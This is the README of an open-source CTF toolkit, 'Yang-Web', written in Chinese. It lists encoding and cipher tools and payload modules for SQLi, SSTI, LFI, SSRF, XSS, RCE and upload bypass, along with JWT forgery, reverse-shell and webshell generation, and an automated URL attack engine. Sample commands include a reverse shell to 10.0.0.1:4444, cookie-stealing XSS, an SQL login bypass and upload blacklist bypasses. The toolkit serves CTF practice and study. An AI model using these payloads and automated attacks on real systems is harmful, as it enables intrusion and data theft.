CTF 一站式工具箱 — 智能解码 + 50+种密码/编码 + 🆕智能攻击引擎 + JWT攻击 + 反弹Shell + 隐写分析 + Payload库 + 靶场分析 + GUI图形界面
Yang-Web 是一把 CTF 全方向的瑞士军刀,覆盖编码解码、密码破解、Payload 生成、靶场分析到攻击利用。内置 图形界面 (GUI),支持 CLI ↔ GUI 一键切换。完全离线,零第三方依赖。
14 个子命令 + 智能解码器(14种编码) + 🆕智能攻击引擎(源码指纹→并发攻击→一键解题) + 50+种密码/编码 + 纯Python密码引擎(AES/RC4/RSA) + 中文特色密码 + 反弹Shell/WebShell生成 + 隐写分析 + 41个内嵌CTF脚本 + JWT攻击链 + 8大Payload模块 + 靶场黑名单分析。
做 CTF 的人都知道一个痛点:工具太多、太散、太贵。
解码要去一个网站,SQL 注入要翻另一个脚本,JWT 破解还得现找 payload……赛场上时间就是分数,翻来翻去浪费的都是解题窗口。市面上的商业工具动辄几百上千,学生党扛不住。
所以我写了 Yang-Web。
一个工具,搞定 CTF 全流程——从拿到题目到读出 Flag,编码解码、漏洞分析、payload 生成、攻击利用一气呵成。
选择 MIT 开源、零依赖、永久免费,是因为我相信好的安全工具不该有门槛。不管你是刚入门的新手,还是打了好几年的老选手,打开终端就能用,不需要折腾环境、不需要掏钱。
如果你觉得这个工具有用,顺手点个 ⭐ Star,或者提个 PR 一起完善。让更多人知道:好用的 CTF 工具,可以免费,也可以开源。
- 📴 完全离线 — 零 pip 依赖,Python 标准库一把梭
- 🧠 智能解码器 — 粘贴即用:自动识别14种编码 + 一键解码 + 暴力全试 + 链式递归
- 🔐 50+种密码/编码 — Base全系 + 古典(凯撒/栅栏/猪圈/培根/Vigenère/ADFGX/摩斯) + 键盘映射 + 🆕中文特色密码(与佛论禅/核心价值观/百家姓...) + 🆕高级编码(Brainfuck/Ook!/JSFuck/AAencode...18种)
- 📦 41个内嵌脚本 — Crypto/Web/Misc/Reverse 全覆盖,一键运行
- 🎯 靶场分析(
--analyze) — 🆕 粘贴黑名单,自动告诉你哪些后缀/绕过能用 - 🧠 🆕 智能攻击引擎 — 粘贴URL→自动分析→一键解题:源码指纹识别 + 并发攻击 + 自适应调度 + 自动读Flag
- 🖥️ 图形界面 — GUI ↔ CLI 一键切换,密码面板即看即用
- 🎯 8大Payload模块 — SSTI/SQLi/LFI/SSRF/XSS/RCE/PHP/Upload
- 🛡️ WAF 绕过 — 30+ SQL WAF + 12类 PHP RCE 绕过
- 🔑 JWT 攻击链 — 解析→None攻击→弱密钥爆破→伪造令牌
- 🔒 🆕 纯Python密码引擎 — AES(ECB/CBC)/RC4/RSA/MD5/SHA全系/BLAKE2/CRC32/HMAC/XOR爆破/进制转换
- 🐚 🆕 反弹Shell & 隐写 — 10种语言反弹Shell + 6种WebShell + PNG分析 + LSB提取 + EXIF读取 + 密文特征识别
pip install yang-web
# 或 GitHub
git clone https://github.com/Yang-afk825/Yang-web.git
cd Yang-web
python -m yang_web自动检测编码格式并链式解码。支持 base64/32/16/58/85、URL、HTML实体、ROT13、二进制/八进制/十进制ASCII、Unicode转义、摩斯电码。
$ yang-web decode "ZmxhZ3t0ZXN0fQ=="
→ flag{test}
$ yang-web decode --brute "dGVzdA==" # 暴力全试明文 → 编码。
$ yang-web encode base64 "hello world"
$ yang-web encode url "admin' OR 1=1--"8 种引擎(Jinja2/Twig/Smarty/Mako/ERB/FreeMarker/Velocity/Django)。
$ yang-web ssti --list # 列出引擎
$ yang-web ssti --exploit --engine Jinja2 # RCE Payload
$ yang-web ssti --bypass --engine Twig # 过滤绕过MySQL/PostgreSQL/MSSQL/Oracle/SQLite + 30种WAF绕过 + 🆕认证绕过。
$ yang-web sqli --list
$ yang-web sqli --db MySQL # 全部MySQL Payload
$ yang-web sqli --blind # 盲注模板
$ yang-web sqli --waf 空白符绕过 # WAF绕过
$ yang-web sqli --search "绕过登录" # 🆕认证绕过Payload$ yang-web lfi --traversal # 路径遍历
$ yang-web lfi --linux / --windows # 敏感文件
$ yang-web lfi --php # 伪协议
$ yang-web lfi --filter-chain # PHP filter chain$ yang-web ssrf --cloud aws # 云元数据
$ yang-web ssrf --internal # 内网探测
$ yang-web ssrf --protocol # 协议利用
$ yang-web ssrf --bypass # 绕过技巧$ yang-web xss --detect
$ yang-web xss --steal cookie
$ yang-web xss --bypass$ yang-web rce --inject # 命令注入Payload
$ yang-web rce --shell bash --ip 10.0.0.1 --port 4444Magic Hash ×27 + 弱类型 ×14 + WAF绕过 ×12。
$ yang-web php --magic
$ yang-web php --waf-php
$ yang-web php --rce覆盖文件上传全攻击面 + 🆕靶场分析。
$ yang-web upload --ext # 后缀名绕过
$ yang-web upload --mime # Content-Type伪造
$ yang-web upload --content # 图片马内容绕过
$ yang-web upload --parse apache # 解析漏洞
$ yang-web upload --htaccess / --userini # 配置文件利用
$ yang-web upload --advanced # 高级技巧
# 🆕 靶场黑名单分析
$ yang-web upload --analyze "php,php3,php5,php7,phtml,shtml,cgi"
→ 🎯 靶场黑名单分析
已拦截: cgi, php, php3, php5, php7, phtml, shtml
✅ 可用后缀: phar, php4, php8, phps, pht
🎯 推荐 .pht — 最常见的绕过后缀
🔤 大小写混合: Php ✅ / PHP ✅ / pHp5 ✅
📦 双后缀: shell.php.jpg
💾 NTFS 数据流: shell.php::$DATA40+ 种 Hash 算法识别。
$ yang-web hashid "e10adc3949ba59abbe56e057f20f883e"
🔍 MD5 / NTLM / MD4$ yang-web jwt "eyJ..." --none # None攻击
$ yang-web jwt "eyJ..." --brute # 弱密钥爆破
$ yang-web jwt "eyJ..." --forge --secret "key" --claim '{"admin":true}'$ yang-web scan dir --search flag
$ yang-web scan file --search backup41 个 CTF 脚本(Crypto/Web/Misc/Reverse)。
$ yang-web scripts # 列出全部
$ yang-web scripts --category crypto # 按分类
$ yang-web scripts --run rsa_toolkit # 运行脚本
$ yang-web scripts --check-deps # 依赖检查# 1. 靶场返回 "用户名或密码错误"
# 2. Yang-Web 找认证绕过
$ yang-web sqli --db MySQL | grep "万能密码"
# 3. 用 admin' OR '1'='1 登录 ✅# 1. 上传 shell.php → BLOCKED: .php not allowed
# 2. 分析黑名单
$ yang-web upload --analyze "php,php3,php5,php7,phtml,shtml,cgi"
# 3. 推荐 .pht → 上传成功 ✅$ yang-web decode "NTI2ZjYyNmY3NDIwNjU2MTczNzk="
# Step 1: base64 → Step 2: base16 → "Robot easy" ✅23 种 CTF 常见密码,支持一键 Encode/Decode。
| 分类 | 密码 |
|---|---|
| 基础编码 | Base64/32/16/58/85, URL, HTML, Unicode, 二进制/八进制/十进制 |
| 古典替换 | 凯撒、埃特巴什、ROT13、维吉尼亚、ADFGX |
| 棋盘/坐标 | 猪圈、培根、波利比奥斯、栅栏、键盘QWE/棋盘/坐标 |
| 中文/特殊 | 当铺、杰斐逊转轮、摩斯、二进制加密、倒序、字母表顺序、数字坐标 |
| 其他 | 标准银河字母、手机键盘、非斯象形文字、蓝孔打卡 |
粘贴目标 URL,一键从分析到拿 Flag:
- 智能分析 — 源码指纹识别(
system()/eval()/$_POST等)+ CMS/WAF 检测 + 漏洞置信度评分 - 并发攻击 — 15 线程并发执行 payload,指数退避重试
- 自适应调度 — 根据指纹自动排序攻击策略(RCE 优先、自动选 GET/POST)
- 一键解题 — 自动攻击 → 自动提权 → 自动读 Flag
yang-web gui
# 或双击桌面 Yang-Web 快捷方式Yang-web/
├── pyproject.toml
├── README.md
├── docs/ # 📚 知识文档
│ └── ctf-guide/ # CTF 全分类解题指南
│ ├── README.md # 索引导航
│ ├── CTF-CheatSheet.md # 速查表
│ ├── SKILL.md # 分类路由 + 解题流程
│ ├── ctf-web.md # Web安全 (725行)
│ ├── ctf-crypto.md # 密码学 (487行)
│ ├── ctf-reverse.md # 逆向 (524行)
│ ├── ctf-pwn.md # 二进制漏洞 (420行)
│ ├── ctf-forensics.md # 取证隐写 (687行)
│ ├── ctf-misc.md # 综合 (563行)
│ ├── ctf-osint.md # 情报调查 (523行)
│ ├── ctf-malware.md # 恶意软件 (541行)
│ └── ctf-aiml.md # AI/ML安全 (480行)
├── yang_web/
│ ├── __init__.py / __main__.py
│ ├── cli.py # CLI (14子命令)
│ ├── gui.py # GUI (图形界面)
│ ├── core/ # 核心引擎 (9个)
│ │ ├── decoder.py # 智能解码 (14种编码)
│ │ ├── misc_crypto.py # 古典密码 (30+种)
│ │ ├── hashid.py / jwt.py # Hash识别 / JWT攻击
│ │ ├── advanced_engines.py # 🆕 高级编码 (18种)
│ │ ├── chinese_ciphers.py # 🆕 中文特色密码 (7种)
│ │ ├── crypto_engine.py # 🆕 密码学引擎
│ │ ├── shell_stego.py # 🆕 Shell & 隐写
│ │ ├── url_analyzer.py # 🆕 v3.0 智能攻击引擎
│ ├── payloads/ # 8大Payload模块
│ │ ├── sqli.py (🆕认证绕过)
│ │ ├── upload.py (🆕--analyze)
│ │ ├── ssti.py / lfi.py / ssrf.py
│ │ ├── xss.py / rce.py / php.py
│ ├── scripts/ # 41个CTF脚本
│ └── wordlists/ # 字典数据
- 🧠 智能攻击引擎 — SmartFingerprinter 源码指纹识别,从响应体检测
system()/exec()/$_POST等危险函数及参数 - ⚡ 并发攻击引擎 — ConcurrentEngine:15 线程并发执行,指数退避重试,发现 Flag 立即停止所有任务
- 🎯 自适应调度器 — AdaptiveScheduler:基于指纹自动排序攻击策略,CTF 优先级(RCE > LFI > SQLi),自动选择 GET/POST 方法
- 🔍 分析增强 — analyze_url 新增 Step 0 源码指纹分析,源码级漏洞直接加成 +40% 置信度
- 🏗️ GUI 线程安全 — queue.Queue + self.after() 序列化 worker→主线程,解决 15 线程并发操作 tkinter 导致的崩溃
- 🆕 高级编码引擎 — 18种冷门编码 (Brainfuck/Ook!/JSFuck/AAencode/Uuencode/XXencode/Quoted-Printable/Punycode/EBCDIC/Baudot/TapCode/Zalgo/ByteSwap/EmojiCode等)
- 🆕 中文特色密码 — 7种中文密码 (与佛论禅/核心价值观编码/兽音/熊曰/百家姓加密/中文电码/Gan语言)
- 🆕 密码学引擎 — 纯Python实现 AES(ECB/CBC 128/192/256位)/RC4/RSA/MD5/SHA全系/BLAKE2/CRC32/HMAC/XOR爆破/N进制转换
- 🆕 反弹Shell & 隐写 — 10种反弹Shell生成 + 6种WebShell + PNG Chunk分析 + LSB提取 + EXIF + 文件魔数 + 密文特征识别
- 🖥️ GUI面板升级 — 新增5个功能面板 (高级编码/中文密码/密码学/Shell生成/隐写分析), 6→11面板
- 📊 密码/编码数: 23 → 50+ | 核心引擎: 5 → 9 | 代码量: ~3000 → ~6500行
- 🆕 Upload 靶场分析 —
--analyze粘贴黑名单,自动推荐绕过方案(CLI+GUI双支持) - 🆕 SQLi 认证绕过 — 8 条万能密码 Payload(
admin' OR '1'='1等) - 🔧 GUI 分类修复 — 下拉框选中后正确加载数据
- 🔧 GUI 列表展开 — 不再截断显示,全部 Payload 可见
- 🔧 密码引擎补全 — Atbash/Caesar/ROT13/Rail Fence/Morse 等补全
- 🔧 GUI 搜索优化 — 输入框支持回车触发搜索
- 🐛 bugfix — AES 解密轮密钥顺序修复、pyproject.toml 构建后端修复
配套解题指南已在 docs/ctf-guide/ 目录下,覆盖 9 大方向 + 5000+ 行深度参考:
- 🔵 Web 安全 — 源码泄露 / 文件包含 / SQL注入 / SSTI / SSRF / JWT / 反序列化
- 🟡 密码学 — RSA攻击全系 / AES模式攻防 / ECC / Lattice / 古典密码
- 🔴 逆向工程 — IDA / angr / Z3 / 脱壳 / APK / 反调试
- 🟣 Pwn — 栈溢出 / ROP / 堆利用 / 格式化字符串
- 🟠 取证隐写 — LSB / 频谱图 / Wireshark / Volatility / 文件修复
- 🟢 Misc — PyJail / 条件竞争 / 网络协议隐写
- ⚫ OSINT — Google Dorks / 图片反查 / Maltego
- 🔴 恶意软件 — LOLBAS / Cobalt Strike / DLL劫持
- 🤖 AI/ML — 模型逆向 / 对抗样本 / LangChain安全
MIT — 详见 LICENSE